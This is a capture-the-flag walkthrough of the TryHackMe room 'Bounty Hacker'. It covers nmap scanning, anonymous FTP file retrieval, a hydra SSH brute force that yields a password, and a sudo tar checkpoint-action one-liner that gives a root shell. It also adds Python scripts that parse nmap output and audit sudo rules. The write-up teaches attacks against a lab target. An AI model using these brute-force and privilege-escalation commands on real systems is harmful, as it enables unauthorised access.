# Bounty Hacker

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbCFjpPmr1V9llgJ4Hm%2F-MbDB-qCzkzn4SooRDbq%2Fimage.png?alt=media\&token=51b8de36-0539-4d70-a650-61e27053214c)

## Reconnaissance

Initial nmap scan to find open ports. The **-Pn** flag ("treat all hosts as alive") skips host discovery, so the scan proceeds even if the target does not answer ping.

```
nmap -Pn 10.10.28.194
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbCFjpPmr1V9llgJ4Hm%2F-MbDBViYP0a_GcvJsRQz%2Fimage.png?alt=media\&token=f1a55630-d788-42b1-a5d4-2d8ae733e7af)

Detailed nmap scan of the discovered ports.

Command breakdown:

* **-sV**: probe the open ports to identify the service and its version
* **-sC**: run nmap's default NSE scripts
* **-p 21,22,80**: scan only ports 21, 22 and 80
* **-oN nmap**: save the output in nmap's normal format to a file called `nmap`

```
nmap -sC -sV -p 21,22,80 -oN nmap 10.10.28.194
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDBj-3XeBJsMV7gqUR%2F-MbDC6d_a2P5fbCVBYYd%2Fimage.png?alt=media\&token=2c6f5bee-513e-477c-96b5-5752b1967716)
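As an added example that is not part of the original writeup, the following Python parses the normal-format file that `-oN nmap` writes, lists the open ports with their service banners, and flags any port whose `ftp-anon` script output reports that anonymous login is allowed, which is the lead the enumeration below follows up on. The embedded report is constructed to match the layout of that file; its version strings, timings and directory-listing details are placeholders, not the target's real banners, and the script name `parse_nmap.py` in the usage comment is hypothetical.

```python
import json
import re
import sys
from dataclasses import dataclass, field

# Constructed sample of nmap "normal" (-oN) output in the layout the scan above
# writes to the file "nmap". Versions, banners, sizes and timings are
# illustrative placeholders, not values taken from the target.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.91 scan initiated Mon Jun 14 12:00:00 2021 as: nmap -sC -sV -p 21,22,80,443 -oN nmap 10.10.28.194
Nmap scan report for 10.10.28.194
Host is up (0.12s latency).

PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
|_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
22/tcp  open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp closed https
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 14 12:00:40 2021 -- 1 IP address (1 host up) scanned in 40.12 seconds
"""

# "21/tcp  open   ftp     vsftpd 3.0.3" -> port, protocol, state, service, free-text version
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# NSE script output sits under its port, prefixed "| " or "|_" (last line of a script)
SCRIPT_LINE = re.compile(r"^\|_?\s?(?P<body>.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    script_output: list = field(default_factory=list)


def parse_normal_output(text):
    """Parse nmap -oN text into Port records, attaching script lines to their port."""
    ports = []
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            current = Port(int(m["port"]), m["proto"], m["state"],
                           m["service"], m["version"].strip())
            ports.append(current)
            continue
        if current is not None and line.startswith("|"):
            current.script_output.append(SCRIPT_LINE.match(line)["body"])
            continue
        # Any other line (header, blank, "Service Info", trailer) ends the script block.
        current = None
    return ports


def open_ports(ports):
    return [p for p in ports if p.state == "open"]


def anonymous_ftp_ports(ports):
    """Port numbers whose ftp-anon script reports a successful anonymous login."""
    hits = []
    for p in open_ports(ports):
        for line in p.script_output:
            if line.startswith("ftp-anon:") and "Anonymous FTP login allowed" in line:
                hits.append(p.number)
                break
    return hits


def summarize(text):
    ports = parse_normal_output(text)
    return {
        "open": [(p.number, p.service, p.version) for p in open_ports(ports)],
        "anonymous_ftp": anonymous_ftp_ports(ports),
    }


if __name__ == "__main__":
    # Usage: python3 parse_nmap.py nmap   (falls back to the constructed sample)
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    print(json.dumps(summarize(source), indent=2))
```

The parser keys on the fixed `PORT/PROTO STATE SERVICE` layout of normal output, so it works for any `-sC -sV` scan, not only this one; anything you want to act on automatically (anonymous FTP here) is a check over the attached script lines rather than a grep over the whole file, which avoids false hits from unrelated scripts that mention the same words.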

## Enumeration

### Port 21

The nmap scan shows that anonymous FTP login is allowed on port 21 (the `ftp-anon` script reports it). Let's log in with the username `anonymous` and any password and see what the server holds.

```
ftp 10.10.28.194
```

Once logged in, listing the directory shows two files, `locks.txt` and `task.txt`. Let's transfer both to our machine with the `get` command.

```
get task.txt
get locks.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDEWaS8tDVEoCtMFd%2Fimage.png?alt=media\&token=002bf3d9-c60f-4556-b3cf-e0153d931abd)

Let's read `task.txt` first.

```
cat task.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDRVQAcABydj8Fs0m%2Fimage.png?alt=media\&token=3fdd7182-5d6b-4f22-8387-76c8d42197a2)

We find a user called `lin`, which is the answer to the third question.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDYc_yiItjUpjy8ay%2Fimage.png?alt=media\&token=863df2d5-e1a3-46dd-9cfa-55c36ba02f4e)

Now let's read `locks.txt`.

```
cat locks.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDCWxMwCjyIqCZacum%2F-MbDDf97eEodOmCrxSXw%2Fimage.png?alt=media\&token=ec904678-9557-45cd-b624-687ccffb37f2)

It looks like a password list. With a username and a password list, we can try to brute-force the SSH login using `hydra`.

## Initial Foothold

Command breakdown:

* **-l lin**: a single username to try
* **-P locks.txt**: a file of candidate passwords, tried one per login attempt
* **ssh**: the service module to attack (hydra connects to port 22 by default)

```
hydra -l lin -P /root/Desktop/TryHackMe/BountyHacker/locks.txt 10.10.28.194 ssh
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDEBn8N5XMMayVjChr%2Fimage.png?alt=media\&token=2a73c920-1e6f-4676-b18f-7abe64f6bcc4)

Hydra finds the password `RedDr4gonSynd1cat3`. Let's log in over SSH with it. The answer to the fourth question is SSH, and the answer to the fifth question is the password hydra found.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDF6V8synaYGtIbvjn%2Fimage.png?alt=media\&token=bfd166b5-7927-4369-8ca4-8db8898df1b7)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDFHIe9YJ5hTcOg5eJ%2Fimage.png?alt=media\&token=7a867f45-bbb4-426d-a37f-fdb79f10c9e9)

We now have a shell as `lin`, so we can read the `user.txt` file, which I already did, but you will have to find that on your own. :)

## Privilege Escalation

Let's run `sudo -l` to list which commands this user may run through sudo, and as which user.

```
sudo -l
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDFrcdlTnDVVbFkYfp%2Fimage.png?alt=media\&token=274b673f-bb19-4076-ac70-d58f0cd773d0)

We can run `/bin/tar` as root. Because the sudo rule names `/bin/tar` without constraining its arguments, we can pass any options we like, and GNU tar's `--checkpoint-action=exec=CMD` option runs an arbitrary command whenever a checkpoint is reached; `--checkpoint=1` makes that happen after the first record, and since sudo executes tar as root, the spawned `/bin/sh` is a root shell. [GTFOBins](https://gtfobins.github.io/gtfobins/tar/#sudo) documents exactly this one-liner:

```
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

Once we run this, we have a root shell.
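As an added example, not part of the original writeup, here is a small Python audit script for `sudo -l` output: it parses each rule into the run-as user, its tags (such as `NOPASSWD`) and the command, then flags entries that a GTFOBins-style shell escape or an argument wildcard would turn into a privilege escalation. The transcript embedded below is constructed: the `/bin/tar` rule mirrors the one this room exposes, while the `(ALL)` and `(www-data)` lines are invented to exercise the parser. The binary list is a small hand-picked subset of what GTFOBins documents, not the full catalogue, and the script name `audit_sudo.py` in the usage comment is hypothetical.

```python
import os
import re
import sys
from dataclasses import dataclass

# Constructed "sudo -l" transcript. The /bin/tar rule mirrors the one found on this
# box; the (ALL) and (www-data) rules are invented to exercise the parser.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/id
    (www-data) /usr/bin/less /var/log/apache2/*
"""

# Hand-picked subset of binaries GTFOBins (https://gtfobins.github.io/) documents as
# able to spawn a shell when run under sudo. Illustrative, not exhaustive.
SHELL_ESCAPE_BINARIES = {
    "tar", "find", "vim", "vi", "less", "more", "awk", "env",
    "python", "python3", "perl", "bash", "sh", "zip", "nmap",
}

# Tags sudoers may prefix a command with; they apply to every later command on the line.
SUDO_TAGS = {
    "NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
    "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
}

# "    (root) /bin/tar" -> run-as spec inside the parentheses, then tags and commands
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")


@dataclass(frozen=True)
class Rule:
    runas: str        # user the command runs as ("root", "ALL", "www-data", ...)
    tags: frozenset   # e.g. frozenset({"NOPASSWD"})
    command: str      # absolute path, or "ALL"
    args: str         # argument restriction as written, "" if unrestricted


def parse_sudo_l(text):
    """Turn the 'may run the following commands' block of sudo -l into Rule objects."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_LINE.match(line) if in_commands else None
        if not m:
            continue
        # "(ALL : ALL)" -> run-as user ALL; the optional group part is not needed here
        runas = m["runas"].split(":")[0].strip()
        tags = set()
        # Commands are comma separated; a comma inside an argument is not handled.
        for spec in m["rest"].split(","):
            parts = spec.split()
            for i, tok in enumerate(parts):
                if tok.endswith(":") and tok[:-1] in SUDO_TAGS:
                    tags.add(tok[:-1])
                    continue
                rules.append(Rule(runas, frozenset(tags), tok, " ".join(parts[i + 1:])))
                break
    return rules


def assess(rule):
    """Return human-readable findings for one rule, empty if nothing stands out."""
    findings = []
    name = os.path.basename(rule.command)
    as_root = rule.runas in ("root", "ALL")
    if rule.command == "ALL":
        findings.append("any command allowed")
    elif name in SHELL_ESCAPE_BINARIES:
        target = "root" if as_root else rule.runas
        findings.append(f"{name} is a known shell escape (GTFOBins): {target} shell")
    if "*" in rule.args:
        findings.append("wildcard in arguments lets the caller add paths or options")
    if findings and "NOPASSWD" in rule.tags:
        findings.append("NOPASSWD: no password prompt, so a hijacked session suffices")
    return findings


def dangerous_rules(text):
    """Parse sudo -l output and return (rule, findings) for every rule with a finding."""
    out = []
    for rule in parse_sudo_l(text):
        findings = assess(rule)
        if findings:
            out.append((rule, findings))
    return out


if __name__ == "__main__":
    # Usage: sudo -l | python3 audit_sudo.py   (falls back to the sample when run bare)
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SUDO_L
    for rule, findings in dangerous_rules(source):
        print(f"({rule.runas}) {rule.command} {rule.args}".rstrip())
        for finding in findings:
            print(f"    - {finding}")
```

On this box the script reports the `/bin/tar` rule as a root shell escape without `NOPASSWD`, which matches what happened: the password hydra recovered was needed at the sudo prompt, and tar then did the rest. The same logic applies from the defensive side when reviewing a sudoers file: a rule that grants a shell-escaping binary as root is equivalent to granting root, whatever the intent behind it.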

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbDDoeOKwrtE151XT2p%2F-MbDGOJLNB119bAW43q9%2Fimage.png?alt=media\&token=6697233d-5820-4915-90d5-e45139ec3949)

Now you can read the `root.txt` file and answer the last question.
